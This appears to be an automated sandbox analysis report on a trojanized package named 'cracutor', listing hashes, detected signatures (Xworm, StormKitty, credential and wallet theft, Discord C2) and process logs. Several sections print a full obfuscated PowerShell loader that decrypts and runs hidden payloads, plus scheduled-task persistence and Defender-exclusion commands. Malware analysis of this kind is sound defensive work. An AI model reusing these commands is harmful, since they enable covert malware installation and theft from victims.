| SHA256 | 5453be08fd7cb0243f86dadf759812daae0b353fc2df6bef909c360ad4af0283 |
| SHA512 | 3cd8bb9fe9586f689a5d2e21e59d56d00d825995c04391b29c73ae2290f85045b546bd23c470b1711ab6762c3a1e60346ecd88766c1bc859b65ecce740437ce7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c31ee3265306fa4fdb1b88fb969b99df |
| SHA1 | 86ea59e68d4a8906eac9cc8a555e04be6f593b75 |
| SHA256 | deb3df57a30c5b4e8148e85dd232b993ed65c162a64c849cb09684a954d4126d |
| SHA512 | 94c517ff6b7d0001c19469c0f2f86674dab6fdef4c71f409028521ed5c9021ee260f18791ed3dc43713aeb56a4068ac1495ab8926e22f557fc1e70189d98d50f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b3df56e2a92e0e9d42d48ea8ec3ef77f |
| SHA1 | d28b465b24832bd9996d73f215b48449e8615483 |
| SHA256 | a94f2a399db515d0c881c13310cb35f24d2494cd1f81bd27bc008386223db499 |
| SHA512 | 7dd66a01ca372b1931103270e1b61b7ea2adb650f5cc736f0b629a6f8a4bbc29cb30a4c35ae0653f4883cab9da6cf5c7b501dfd322a052ea253531c3d3a15b9c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f8d8bdd2164570408afb226b7a441662 |
| SHA1 | e7d8d22cba00793f373a5da3f3ca1e73c831c968 |
| SHA256 | edd226cc0bc4fb9c9c2cac307c8bb56e20f8a1269f3337d0156b3a1b86faedbb |
| SHA512 | 207cfcf15df956bc13b940b6e13e8add3fb9fdcc0251002694eaee80b8f5605a57ee448f9902db21e9565acbda83e7b953d359f3283a5dde0c53a99bd833fd61 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c75cf1c07b30a7487a62074a0c1153a |
| SHA1 | ecc0f2556d7d02daafea0013e5944e7aa0b4676c |
| SHA256 | 63498da9895c61eb719a8f4aa75874d7254860e548b8abcebfbc94c62a7789ea |
| SHA512 | 3daed3ba765043c1bbe675b1ae970171e2809a5d2ccec33273d0d6ae5d9adf6e96d8d774e04f7adbd790ffb8684e8cb46f2a8a4c9bef409bcd7b82edd6b5dd39 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
136s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2204 wrote to memory of 2200 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2204 wrote to memory of 2200 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2204 wrote to memory of 2200 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
Files
memory/2200-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp
memory/2200-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/2200-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/2200-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/2200-6-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2200-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/2200-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/2200-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
memory/2200-12-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
105s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
130s
Max time network
99s
Command Line
Signatures
Processes
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/4512-0-0x00007FF96BA30000-0x00007FF96BA40000-memory.dmp
memory/4512-1-0x00007FF9ABA4D000-0x00007FF9ABA4E000-memory.dmp
memory/4512-2-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp
memory/4512-3-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240508-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scriptblox.com | udp |
| US | 172.67.68.166:443 | scriptblox.com | tcp |
| US | 8.8.8.8:53 | 166.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/3764-0-0x0000000074A9E000-0x0000000074A9F000-memory.dmp
memory/3764-1-0x00000000002D0000-0x00000000004CE000-memory.dmp
memory/3764-2-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/3764-3-0x00000000055A0000-0x0000000005B44000-memory.dmp
memory/3764-4-0x0000000005090000-0x000000000512E000-memory.dmp
memory/3764-5-0x0000000005B50000-0x0000000005BE2000-memory.dmp
memory/3764-6-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/3764-7-0x00000000054D0000-0x00000000054D8000-memory.dmp
memory/3764-8-0x0000000005520000-0x0000000005558000-memory.dmp
memory/3764-9-0x00000000054F0000-0x00000000054FE000-memory.dmp
memory/3764-10-0x0000000074A9E000-0x0000000074A9F000-memory.dmp
memory/3764-14-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/3764-15-0x0000000074A90000-0x0000000075240000-memory.dmp
memory/3764-16-0x0000000074A90000-0x0000000075240000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
137s
Max time network
144s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\idcljz.exe | C:\Users\Admin\AppData\Local\Temp\idcljz.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\idcljz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\idcljz.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_863_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_863.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_863.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_863.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_863.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_863.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
C:\Users\Admin\AppData\Local\Temp\idcljz.exe
"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"
C:\Users\Admin\AppData\Local\Temp\idcljz.exe
"C:\Users\Admin\AppData\Local\Temp\idcljz.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
